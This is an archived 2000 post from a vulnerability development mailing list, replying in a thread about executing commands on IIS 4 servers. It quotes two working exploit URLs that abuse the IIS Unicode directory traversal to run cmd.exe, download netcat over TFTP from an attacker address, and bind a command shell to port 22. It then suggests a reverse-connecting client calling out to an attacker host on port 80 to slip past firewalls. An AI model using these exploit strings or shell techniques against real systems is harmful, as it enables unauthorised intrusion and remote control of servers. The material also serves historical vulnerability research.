Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: dos commands via iis 4 (TFTP)

From: "Bluefish (P.Magnusson)" <11a () GMX NET>
Date: Wed, 15 Nov 2000 14:01:38 +0100
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+<IPADDR>+get+nc.exe+c:\inetpub\scripts\nc.exe
http://.../scripts/..%c0%af../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\nc.exe+-l+-p+22+-t+-e+cmd.exe
So after this, there is a port open (22 in this case as many admins will
leave this open for SSH, but this is an NT box, which as we know rarely
has SSH running on it) that I can telnet to and have a command prompt.


An more reliable attack though, would be to download and execute a client
which connects to www.attacker.com:80, only port 80 won't be running a
webserver but a server for the client.

That way it will overcome more firewalls; only an application level
firewall or a closed DMZ would cause problems, where as the attack you
describe rely on some server port not being firewalled.

..:::::::::::::::::::::::::::::::::::::::::::::::::..
     http://www.11a.nu || http://bluefish.11a.nu
    eleventh alliance development & security team

             http://www.eff.org/cafe
Previous By Date Next
Previous By Thread Next

Current thread: